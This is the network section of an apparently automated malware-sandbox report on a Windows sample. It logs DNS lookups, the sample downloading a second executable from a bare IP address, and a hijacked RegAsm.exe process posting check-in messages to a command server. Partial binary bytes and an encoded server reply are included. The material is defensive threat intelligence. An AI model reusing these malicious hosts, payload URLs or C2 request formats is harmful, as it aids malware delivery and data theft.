Nov 8, 2024 12:02:33.226151943 CET	443	49738	172.67.187.9	192.168.2.9
Nov 8, 2024 12:02:33.925731897 CET	443	49738	172.67.187.9	192.168.2.9
Nov 8, 2024 12:02:33.925805092 CET	443	49738	172.67.187.9	192.168.2.9
Nov 8, 2024 12:02:33.925885916 CET	49738	443	192.168.2.9	172.67.187.9
Nov 8, 2024 12:02:33.980189085 CET	49738	443	192.168.2.9	172.67.187.9
Nov 8, 2024 12:02:33.980221033 CET	443	49738	172.67.187.9	192.168.2.9
Nov 8, 2024 12:02:34.258161068 CET	49749	443	192.168.2.9	172.67.187.9
Nov 8, 2024 12:02:34.258208990 CET	443	49749	172.67.187.9	192.168.2.9
Nov 8, 2024 12:02:34.258280039 CET	49749	443	192.168.2.9	172.67.187.9
Nov 8, 2024 12:02:34.258593082 CET	49749	443	192.168.2.9	172.67.187.9
Nov 8, 2024 12:02:34.258609056 CET	443	49749	172.67.187.9	192.168.2.9
Nov 8, 2024 12:02:34.864217043 CET	443	49749	172.67.187.9	192.168.2.9
Nov 8, 2024 12:02:34.864320993 CET	49749	443	192.168.2.9	172.67.187.9
Nov 8, 2024 12:02:34.865681887 CET	49749	443	192.168.2.9	172.67.187.9
Nov 8, 2024 12:02:34.865689039 CET	443	49749	172.67.187.9	192.168.2.9
Nov 8, 2024 12:02:34.865937948 CET	443	49749	172.67.187.9	192.168.2.9
Nov 8, 2024 12:02:34.867311001 CET	49749	443	192.168.2.9	172.67.187.9
Nov 8, 2024 12:02:34.867358923 CET	49749	443	192.168.2.9	172.67.187.9
Nov 8, 2024 12:02:34.867398977 CET	443	49749	172.67.187.9	192.168.2.9
Nov 8, 2024 12:02:35.353815079 CET	443	49749	172.67.187.9	192.168.2.9
Nov 8, 2024 12:02:35.353868961 CET	443	49749	172.67.187.9	192.168.2.9
Nov 8, 2024 12:02:35.353899002 CET	443	49749	172.67.187.9	192.168.2.9
Nov 8, 2024 12:02:35.353923082 CET	49749	443	192.168.2.9	172.67.187.9
Nov 8, 2024 12:02:35.353925943 CET	443	49749	172.67.187.9	192.168.2.9
Nov 8, 2024 12:02:35.353952885 CET	443	49749	172.67.187.9	192.168.2.9
Nov 8, 2024 12:02:35.353965998 CET	49749	443	192.168.2.9	172.67.187.9
Nov 8, 2024 12:02:35.353996992 CET	443	49749	172.67.187.9	192.168.2.9
Nov 8, 2024 12:02:35.354027033 CET	443	49749	172.67.187.9	192.168.2.9
Nov 8, 2024 12:02:35.354048014 CET	49749	443	192.168.2.9	172.67.187.9
Nov 8, 2024 12:02:35.354054928 CET	443	49749	172.67.187.9	192.168.2.9
Nov 8, 2024 12:02:35.354094028 CET	49749	443	192.168.2.9	172.67.187.9
Nov 8, 2024 12:02:35.354099989 CET	443	49749	172.67.187.9	192.168.2.9
Nov 8, 2024 12:02:35.358726025 CET	443	49749	172.67.187.9	192.168.2.9
Nov 8, 2024 12:02:35.358772993 CET	49749	443	192.168.2.9	172.67.187.9
Nov 8, 2024 12:02:35.358782053 CET	443	49749	172.67.187.9	192.168.2.9
Nov 8, 2024 12:02:35.403861046 CET	49749	443	192.168.2.9	172.67.187.9
Nov 8, 2024 12:02:35.470781088 CET	443	49749	172.67.187.9	192.168.2.9
Nov 8, 2024 12:02:35.470843077 CET	443	49749	172.67.187.9	192.168.2.9
Nov 8, 2024 12:02:35.470870972 CET	443	49749	172.67.187.9	192.168.2.9
Nov 8, 2024 12:02:35.470892906 CET	49749	443	192.168.2.9	172.67.187.9
Nov 8, 2024 12:02:35.470923901 CET	443	49749	172.67.187.9	192.168.2.9
Nov 8, 2024 12:02:35.470957041 CET	443	49749	172.67.187.9	192.168.2.9
Nov 8, 2024 12:02:35.470962048 CET	49749	443	192.168.2.9	172.67.187.9
Nov 8, 2024 12:02:35.470995903 CET	49749	443	192.168.2.9	172.67.187.9
Nov 8, 2024 12:02:35.471163034 CET	49749	443	192.168.2.9	172.67.187.9
Nov 8, 2024 12:02:35.471175909 CET	443	49749	172.67.187.9	192.168.2.9
Nov 8, 2024 12:02:35.471214056 CET	49749	443	192.168.2.9	172.67.187.9
Nov 8, 2024 12:02:35.471220016 CET	443	49749	172.67.187.9	192.168.2.9
Nov 8, 2024 12:02:35.498055935 CET	49755	443	192.168.2.9	172.67.187.9
Nov 8, 2024 12:02:35.498099089 CET	443	49755	172.67.187.9	192.168.2.9
Nov 8, 2024 12:02:35.498172045 CET	49755	443	192.168.2.9	172.67.187.9
Nov 8, 2024 12:02:35.498631954 CET	49755	443	192.168.2.9	172.67.187.9
Nov 8, 2024 12:02:35.498648882 CET	443	49755	172.67.187.9	192.168.2.9
Nov 8, 2024 12:02:36.107640028 CET	443	49755	172.67.187.9	192.168.2.9
Nov 8, 2024 12:02:36.107811928 CET	49755	443	192.168.2.9	172.67.187.9
Nov 8, 2024 12:02:36.109524012 CET	49755	443	192.168.2.9	172.67.187.9
Nov 8, 2024 12:02:36.109534979 CET	443	49755	172.67.187.9	192.168.2.9
Nov 8, 2024 12:02:36.109807968 CET	443	49755	172.67.187.9	192.168.2.9
Nov 8, 2024 12:02:36.111124039 CET	49755	443	192.168.2.9	172.67.187.9
Nov 8, 2024 12:02:36.111376047 CET	49755	443	192.168.2.9	172.67.187.9
Nov 8, 2024 12:02:36.111409903 CET	443	49755	172.67.187.9	192.168.2.9
Nov 8, 2024 12:02:36.918483019 CET	443	49755	172.67.187.9	192.168.2.9
Nov 8, 2024 12:02:36.918560028 CET	443	49755	172.67.187.9	192.168.2.9
Nov 8, 2024 12:02:36.918692112 CET	49755	443	192.168.2.9	172.67.187.9
Nov 8, 2024 12:02:36.918889999 CET	49755	443	192.168.2.9	172.67.187.9
Nov 8, 2024 12:02:36.918911934 CET	443	49755	172.67.187.9	192.168.2.9
Nov 8, 2024 12:02:36.940644026 CET	49766	443	192.168.2.9	172.67.187.9
Nov 8, 2024 12:02:36.940694094 CET	443	49766	172.67.187.9	192.168.2.9
Nov 8, 2024 12:02:36.940834045 CET	49766	443	192.168.2.9	172.67.187.9
Nov 8, 2024 12:02:36.941163063 CET	49766	443	192.168.2.9	172.67.187.9
Nov 8, 2024 12:02:36.941174030 CET	443	49766	172.67.187.9	192.168.2.9
Nov 8, 2024 12:02:37.546891928 CET	443	49766	172.67.187.9	192.168.2.9
Nov 8, 2024 12:02:37.547069073 CET	49766	443	192.168.2.9	172.67.187.9
Nov 8, 2024 12:02:37.548823118 CET	49766	443	192.168.2.9	172.67.187.9
Nov 8, 2024 12:02:37.548827887 CET	443	49766	172.67.187.9	192.168.2.9
Nov 8, 2024 12:02:37.549108028 CET	443	49766	172.67.187.9	192.168.2.9
Nov 8, 2024 12:02:37.550573111 CET	49766	443	192.168.2.9	172.67.187.9
Nov 8, 2024 12:02:37.550806046 CET	49766	443	192.168.2.9	172.67.187.9
Nov 8, 2024 12:02:37.550837040 CET	443	49766	172.67.187.9	192.168.2.9
Nov 8, 2024 12:02:37.550888062 CET	49766	443	192.168.2.9	172.67.187.9
Nov 8, 2024 12:02:37.550894022 CET	443	49766	172.67.187.9	192.168.2.9
Nov 8, 2024 12:02:38.079649925 CET	443	49766	172.67.187.9	192.168.2.9
Nov 8, 2024 12:02:38.079751015 CET	443	49766	172.67.187.9	192.168.2.9
Nov 8, 2024 12:02:38.079869986 CET	49766	443	192.168.2.9	172.67.187.9
Nov 8, 2024 12:02:38.080055952 CET	49766	443	192.168.2.9	172.67.187.9
Nov 8, 2024 12:02:38.080073118 CET	443	49766	172.67.187.9	192.168.2.9
Nov 8, 2024 12:02:38.168560982 CET	49772	443	192.168.2.9	172.67.187.9
Nov 8, 2024 12:02:38.168615103 CET	443	49772	172.67.187.9	192.168.2.9
Nov 8, 2024 12:02:38.168736935 CET	49772	443	192.168.2.9	172.67.187.9
Nov 8, 2024 12:02:38.169076920 CET	49772	443	192.168.2.9	172.67.187.9
Nov 8, 2024 12:02:38.169090033 CET	443	49772	172.67.187.9	192.168.2.9
Nov 8, 2024 12:02:38.773384094 CET	443	49772	172.67.187.9	192.168.2.9
Nov 8, 2024 12:02:38.773731947 CET	49772	443	192.168.2.9	172.67.187.9
Nov 8, 2024 12:02:38.775084019 CET	49772	443	192.168.2.9	172.67.187.9
Nov 8, 2024 12:02:38.775093079 CET	443	49772	172.67.187.9	192.168.2.9
Nov 8, 2024 12:02:38.775333881 CET	443	49772	172.67.187.9	192.168.2.9
Nov 8, 2024 12:02:38.776587963 CET	49772	443	192.168.2.9	172.67.187.9
Nov 8, 2024 12:02:38.776664019 CET	49772	443	192.168.2.9	172.67.187.9
Nov 8, 2024 12:02:38.776695013 CET	443	49772	172.67.187.9	192.168.2.9
Nov 8, 2024 12:02:38.776772976 CET	49772	443	192.168.2.9	172.67.187.9
Nov 8, 2024 12:02:38.776783943 CET	443	49772	172.67.187.9	192.168.2.9
Nov 8, 2024 12:02:40.459104061 CET	443	49772	172.67.187.9	192.168.2.9
Nov 8, 2024 12:02:40.459194899 CET	443	49772	172.67.187.9	192.168.2.9
Nov 8, 2024 12:02:40.459249020 CET	49772	443	192.168.2.9	172.67.187.9
Nov 8, 2024 12:02:40.459408045 CET	49772	443	192.168.2.9	172.67.187.9
Nov 8, 2024 12:02:40.459425926 CET	443	49772	172.67.187.9	192.168.2.9
Nov 8, 2024 12:02:40.655139923 CET	49788	443	192.168.2.9	172.67.187.9
Nov 8, 2024 12:02:40.655200958 CET	443	49788	172.67.187.9	192.168.2.9
Nov 8, 2024 12:02:40.655275106 CET	49788	443	192.168.2.9	172.67.187.9
Nov 8, 2024 12:02:40.655699015 CET	49788	443	192.168.2.9	172.67.187.9
Nov 8, 2024 12:02:40.655715942 CET	443	49788	172.67.187.9	192.168.2.9
Nov 8, 2024 12:02:41.273528099 CET	443	49788	172.67.187.9	192.168.2.9
Nov 8, 2024 12:02:41.273657084 CET	49788	443	192.168.2.9	172.67.187.9
Nov 8, 2024 12:02:41.275419950 CET	49788	443	192.168.2.9	172.67.187.9
Nov 8, 2024 12:02:41.275441885 CET	443	49788	172.67.187.9	192.168.2.9
Nov 8, 2024 12:02:41.276097059 CET	443	49788	172.67.187.9	192.168.2.9
Nov 8, 2024 12:02:41.277913094 CET	49788	443	192.168.2.9	172.67.187.9
Nov 8, 2024 12:02:41.278017044 CET	49788	443	192.168.2.9	172.67.187.9
Nov 8, 2024 12:02:41.278023005 CET	443	49788	172.67.187.9	192.168.2.9
Nov 8, 2024 12:02:42.002933025 CET	443	49788	172.67.187.9	192.168.2.9
Nov 8, 2024 12:02:42.003026962 CET	443	49788	172.67.187.9	192.168.2.9
Nov 8, 2024 12:02:42.003134966 CET	49788	443	192.168.2.9	172.67.187.9
Nov 8, 2024 12:02:42.003385067 CET	49788	443	192.168.2.9	172.67.187.9
Nov 8, 2024 12:02:42.003403902 CET	443	49788	172.67.187.9	192.168.2.9
Nov 8, 2024 12:02:42.062315941 CET	49794	443	192.168.2.9	172.67.187.9
Nov 8, 2024 12:02:42.062357903 CET	443	49794	172.67.187.9	192.168.2.9
Nov 8, 2024 12:02:42.062428951 CET	49794	443	192.168.2.9	172.67.187.9
Nov 8, 2024 12:02:42.062915087 CET	49794	443	192.168.2.9	172.67.187.9
Nov 8, 2024 12:02:42.062927961 CET	443	49794	172.67.187.9	192.168.2.9
Nov 8, 2024 12:02:42.666634083 CET	443	49794	172.67.187.9	192.168.2.9
Nov 8, 2024 12:02:42.666704893 CET	49794	443	192.168.2.9	172.67.187.9
Nov 8, 2024 12:02:42.668863058 CET	49794	443	192.168.2.9	172.67.187.9
Nov 8, 2024 12:02:42.668869019 CET	443	49794	172.67.187.9	192.168.2.9
Nov 8, 2024 12:02:42.669097900 CET	443	49794	172.67.187.9	192.168.2.9
Nov 8, 2024 12:02:42.670874119 CET	49794	443	192.168.2.9	172.67.187.9
Nov 8, 2024 12:02:42.670950890 CET	49794	443	192.168.2.9	172.67.187.9
Nov 8, 2024 12:02:42.670955896 CET	443	49794	172.67.187.9	192.168.2.9
Nov 8, 2024 12:02:43.938009977 CET	443	49794	172.67.187.9	192.168.2.9
Nov 8, 2024 12:02:43.938097000 CET	443	49794	172.67.187.9	192.168.2.9
Nov 8, 2024 12:02:43.938158035 CET	49794	443	192.168.2.9	172.67.187.9
Nov 8, 2024 12:02:43.938390017 CET	49794	443	192.168.2.9	172.67.187.9
Nov 8, 2024 12:02:43.938410044 CET	443	49794	172.67.187.9	192.168.2.9
Nov 8, 2024 12:02:43.943228006 CET	49805	443	192.168.2.9	172.67.187.9
Nov 8, 2024 12:02:43.943263054 CET	443	49805	172.67.187.9	192.168.2.9
Nov 8, 2024 12:02:43.943370104 CET	49805	443	192.168.2.9	172.67.187.9
Nov 8, 2024 12:02:43.943691969 CET	49805	443	192.168.2.9	172.67.187.9
Nov 8, 2024 12:02:43.943701029 CET	443	49805	172.67.187.9	192.168.2.9
Nov 8, 2024 12:02:44.498002052 CET	49805	443	192.168.2.9	172.67.187.9

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 8, 2024 12:02:32.509783030 CET	63293	53	192.168.2.9	1.1.1.1
Nov 8, 2024 12:02:32.550107956 CET	53	63293	1.1.1.1	192.168.2.9

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Nov 8, 2024 12:02:32.509783030 CET	192.168.2.9	1.1.1.1	0x4df0	Standard query (0)	knifedxejsu.cyou	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Nov 8, 2024 12:02:25.260150909 CET	1.1.1.1	192.168.2.9	0x8171	No error (0)	shed.dual-low.s-part-0017.t-0009.t-msedge.net	s-part-0017.t-0009.t-msedge.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 8, 2024 12:02:25.260150909 CET	1.1.1.1	192.168.2.9	0x8171	No error (0)	s-part-0017.t-0009.t-msedge.net		13.107.246.45	A (IP address)	IN (0x0001)	false
Nov 8, 2024 12:02:32.550107956 CET	1.1.1.1	192.168.2.9	0x4df0	No error (0)	knifedxejsu.cyou		172.67.187.9	A (IP address)	IN (0x0001)	false
Nov 8, 2024 12:02:32.550107956 CET	1.1.1.1	192.168.2.9	0x4df0	No error (0)	knifedxejsu.cyou		104.21.19.177	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

knifedxejsu.cyou

147.45.44.131

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.9	49717	147.45.44.131	80	6072	C:\Users\user\Desktop\TZ33WZy6QL.exe

Timestamp	Bytes transferred	Direction	Data
Nov 8, 2024 12:02:29.194366932 CET	180	OUT	GET /infopage/tbg9.exe HTTP/1.1 X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq Host: 147.45.44.131 Connection: Keep-Alive
Nov 8, 2024 12:02:30.037547112 CET	1236	IN	HTTP/1.1 200 OK Date: Fri, 08 Nov 2024 11:02:29 GMT Server: Apache/2.4.52 (Ubuntu) Last-Modified: Wed, 06 Nov 2024 18:11:21 GMT ETag: "4c200-6264271ea9617" Accept-Ranges: bytes Content-Length: 311808 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: application/x-msdos-program Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 04 00 91 33 25 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 f8 03 00 00 c6 00 00 00 00 00 00 00 d4 00 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 90 05 00 00 04 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 38 30 04 00 8c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 05 00 3c 41 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 8c 31 [TRUNCATED] Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL3%g@@80@<A1.textZ `.rdata]%&@@.datap@^"@.reloc<A@B@B
Nov 8, 2024 12:02:30.037574053 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: USWVhED$,]}D$LGCT$t%%%%%t><%T$u(t)
Nov 8, 2024 12:02:30.037587881 CET	1236	IN	Data Raw: 42 0f 95 c0 66 c7 44 24 40 02 30 c0 e0 05 0c 42 88 44 24 42 c7 44 24 28 80 01 00 00 b9 01 00 00 00 f6 c3 20 0f 84 dd 02 00 00 8b 54 24 2c 8b 02 8b 72 04 83 c2 08 89 54 24 2c e9 d7 02 00 00 b8 15 10 44 00 80 fa 47 74 05 b8 02 10 44 00 89 44 24 04 Data Ascii: BfD$@0BD$BD$( T$,rT$,DGtDD$D$,L$tG\$L$XL$$L$L$DL$L$($D$$tL$(9r\|$\|$\|0QN
Nov 8, 2024 12:02:30.037600040 CET	1236	IN	Data Raw: 2f fe ff ff e9 4d fb ff ff 8b 44 24 2c 8b 00 bb ba 2f 44 00 85 c0 74 02 89 c3 8b 44 24 10 89 c1 85 c0 79 05 b9 ff ff ff ff f6 c3 03 89 74 24 24 0f 84 dc 0c 00 00 89 4c 24 04 01 d9 83 7c 24 10 00 0f 84 25 10 00 00 80 3b 00 0f 84 aa 0f 00 00 8d 53 Data Ascii: /MD$,/DtD$yt$$L$\|$%;SD$HT$T$:SD$T$mT$:SD$T$AT$:CD$7\|$wp
Nov 8, 2024 12:02:30.037612915 CET	448	IN	Data Raw: 03 75 e1 c6 44 34 63 2c 4e 49 31 d2 eb dd 8b 54 24 14 b8 01 00 00 00 8b 4c 24 10 83 f9 ff 74 02 89 c8 c7 44 24 10 00 00 00 00 81 fa 00 04 00 00 8b 4c 24 08 83 d9 00 72 04 89 44 24 10 89 54 24 58 8b 44 24 08 89 44 24 5c df 6c 24 58 31 c0 f7 c3 00 Data Ascii: uD4c,NI1T$L$tD$L$rD$T$XD$D$\l$X1PDW\|4d0D$4D$@-\$$x u+tD$@T$A 4dT$(u@
Nov 8, 2024 12:02:30.037725925 CET	1236	IN	Data Raw: b9 1f 85 eb 51 f7 e9 89 d1 89 d0 c1 e8 1f c1 f9 05 01 c1 89 c8 ba 67 66 66 66 f7 ea 89 d0 c1 e8 1f c1 ea 02 01 c2 01 d2 8d 04 92 89 ca 29 c2 80 c2 30 8d 44 24 34 88 54 03 fe 8b 54 24 20 2b 54 24 08 42 89 4c 24 3c c7 44 24 1c 01 00 00 03 e9 fa 08 Data Ascii: Qgfff)0D$4TT$ +T$BL$<D$D$,D$(L$<\|#;L$)\|$019~N\|$01\|$0rwdvwRwBv
Nov 8, 2024 12:02:30.037735939 CET	212	IN	Data Raw: f3 10 c1 e6 10 c1 e8 0c 83 e0 0f 8b 4c 24 04 0f b6 04 01 88 42 03 8d 4a 04 8b 54 24 08 89 d8 83 c2 fc 75 9c 8d b4 24 a6 00 00 00 89 74 24 08 8b 7c 24 30 8b 54 24 20 8b 5c 24 1c 80 7c 24 54 41 0f 95 c0 c0 e0 05 0c 50 88 44 24 35 85 db 78 07 c6 44 Data Ascii: L$BJT$u$t$\|$0T$ \$\|$TAPD$5xD$6+D$6-T$ L$wcD$D$D$4gfffgfff)\$\$40D
Nov 8, 2024 12:02:30.037746906 CET	1236	IN	Data Raw: 34 89 d0 c1 e8 1f c1 fa 02 01 c2 01 d2 8d 04 92 29 c1 80 c1 30 88 4c 1c 33 80 7c 24 10 00 0f 85 c6 01 00 00 89 f0 b9 1f 85 eb 51 f7 e9 89 d1 89 d0 c1 e8 1f c1 f9 05 01 c1 89 c8 ba 67 66 66 66 f7 ea 89 d0 c1 e8 1f c1 fa 02 01 c2 01 d2 8d 04 92 29 Data Ascii: 4)0L3\|$Qgfff)0D$4LMbgfff)0D$4LA,D$D$9\|$0\|)\$\|sAC
Nov 8, 2024 12:02:30.037761927 CET	1236	IN	Data Raw: f6 c3 01 0f 85 ef 01 00 00 8b 4c 24 48 85 c9 7f 1f e9 e2 01 00 00 90 90 89 c7 8b 54 24 18 8b 44 24 04 8b 4c 24 48 29 c1 85 c9 0f 8e bf 01 00 00 89 d0 29 f8 05 00 02 00 00 89 cb 39 c1 7c 02 89 c3 85 f6 75 02 89 cb 89 5c 24 04 85 db 89 54 24 18 89 Data Ascii: L$HT$D$L$H))9\|u\$T$L$HtatZG L$ItStLGG L$t<t5GG L$t%tG D$HL$\|\|QGt10 9u)rN
Nov 8, 2024 12:02:30.037774086 CET	1236	IN	Data Raw: 90 90 90 90 85 c9 0f 84 44 ff ff ff f6 c1 01 75 13 89 ca eb 3c 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 31 ff 3b 74 24 04 0f 95 c2 74 03 8d 7e 01 b6 30 f6 44 24 24 40 74 0a c0 e2 02 80 c2 2c 88 d6 89 fe 89 74 24 08 88 30 40 8d 51 ff 89 c6 8b Data Ascii: Du<1;t$t~0D$$@t,t$0@Q]uG?T$)=0D$LPuR/Ot1t$;t$t~D$$@t;t$tFD$$
Nov 8, 2024 12:02:30.042660952 CET	1236	IN	Data Raw: bf 85 c0 74 4b 89 c1 83 e1 07 8b 75 08 74 51 89 fe 31 d2 89 df 90 90 90 90 90 90 90 90 90 90 90 0f b6 1c 17 88 1c 16 42 39 d1 75 f4 01 d6 89 c1 29 d1 01 d7 89 fb 8b 54 24 18 89 f7 8b 75 08 83 f8 08 73 2c eb 6b 90 90 90 90 90 90 90 90 90 90 8b 75 Data Ascii: tKutQ1B9u)T$us,ku\rJCGCGCGCGCGCGCGu\$S)=\$PDD$LPuR%T$

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.9	49738	172.67.187.9	443	4588	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-08 11:02:33 UTC	263	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: knifedxejsu.cyou
2024-11-08 11:02:33 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-11-08 11:02:33 UTC	1011	IN	HTTP/1.1 200 OK Date: Fri, 08 Nov 2024 11:02:33 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=lvlnc1n26cveu5jin0fpr49dpj; expires=Tue, 04-Mar-2025 04:49:12 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=CPzr%2B%2BUy2YAi%2BY4JWLbFdv923DFjkaxsc5y4OYYHekxvETVFPBw5nLMh81nQrFsuJInRXxfVGaOCDn1vFq3%2FgQZqfsybBF0n%2BRcRhNQIlCOMo22uX6aO28vzUgabZl9AvsyR"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8df5124a0ce32c86-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1977&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2838&recv_bytes=907&delivery_rate=1470797&cwnd=235&unsent_bytes=0&cid=ca9204b567013af9&ts=764&x=0"
2024-11-08 11:02:33 UTC	7	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a Data Ascii: 2ok
2024-11-08 11:02:33 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.9	49749	172.67.187.9	443	4588	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-08 11:02:34 UTC	264	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 81 Host: knifedxejsu.cyou
2024-11-08 11:02:34 UTC	81	OUT	Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 48 70 4f 6f 49 68 2d 2d 40 74 6f 70 67 63 72 26 6a 3d 62 39 61 62 63 37 36 63 65 35 33 62 36 66 63 33 61 30 33 35 36 36 66 38 66 37 36 34 66 35 65 61 Data Ascii: act=recive_message&ver=4.0&lid=HpOoIh--@topgcr&j=b9abc76ce53b6fc3a03566f8f764f5ea
2024-11-08 11:02:35 UTC	1011	IN	HTTP/1.1 200 OK Date: Fri, 08 Nov 2024 11:02:35 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=3to8mb6q8cesnsjnkslghj4eh4; expires=Tue, 04-Mar-2025 04:49:14 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=HrNxl9%2Fe3PG2IBfVIE0VSgQoC%2FVLa2jMUGH7%2FXN9RSVdLdeEthqRPXHHPVoXSwTLu8zSkIAHZ05Oz6aOpBmGEeJUMw5quAo%2BNfTmsEY0ujZYy5RpBX5IutNQRhglz08d%2BI3T"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8df512544e12cb76-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1073&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2838&recv_bytes=981&delivery_rate=2616079&cwnd=252&unsent_bytes=0&cid=baf59ed4cfd09b3e&ts=494&x=0"
2024-11-08 11:02:35 UTC	358	IN	Data Raw: 34 32 65 34 0d 0a 42 4b 75 42 35 78 46 44 73 34 7a 54 71 73 6f 62 6e 66 55 56 4f 65 69 58 59 38 42 4d 41 59 55 2b 73 54 35 32 39 36 53 43 4a 42 74 2f 69 66 66 46 4b 33 65 66 72 71 44 50 36 43 48 37 6c 48 6c 4b 6a 62 74 42 6f 53 67 6a 76 31 6a 51 55 67 57 53 69 4b 42 53 64 69 61 52 35 34 5a 39 4d 4e 61 67 38 63 2b 79 4f 61 65 75 62 68 75 4e 2b 55 48 36 62 6d 54 76 58 4e 42 53 46 4a 62 50 37 56 52 33 5a 38 50 74 67 48 6b 6d 30 4f 69 79 78 71 64 2b 2b 4a 42 30 55 34 62 2b 44 71 67 68 49 36 6b 63 31 45 52 55 7a 59 62 50 51 57 39 6c 35 75 43 55 65 6d 48 4f 6f 4b 69 49 72 33 57 2f 7a 7a 64 59 6a 66 55 50 70 69 68 71 37 56 62 5a 57 68 57 54 7a 76 4a 4e 66 57 7a 44 34 34 4e 34 4c 4e 6e 38 76 38 79 67 64 66 36 61 64 42 76 45 74 51 61 36 62 6a 75 6e 44 2b 46 66 42 Data Ascii: 42e4BKuB5xFDs4zTqsobnfUVOeiXY8BMAYU+sT5296SCJBt/iffFK3efrqDP6CH7lHlKjbtBoSgjv1jQUgWSiKBSdiaR54Z9MNag8c+yOaeubhuN+UH6bmTvXNBSFJbP7VR3Z8PtgHkm0Oiyxqd++JB0U4b+DqghI6kc1ERUzYbPQW9l5uCUemHOoKiIr3W/zzdYjfUPpihq7VbZWhWTzvJNfWzD44N4LNn8v8ygdf6adBvEtQa6bjunD+FfB
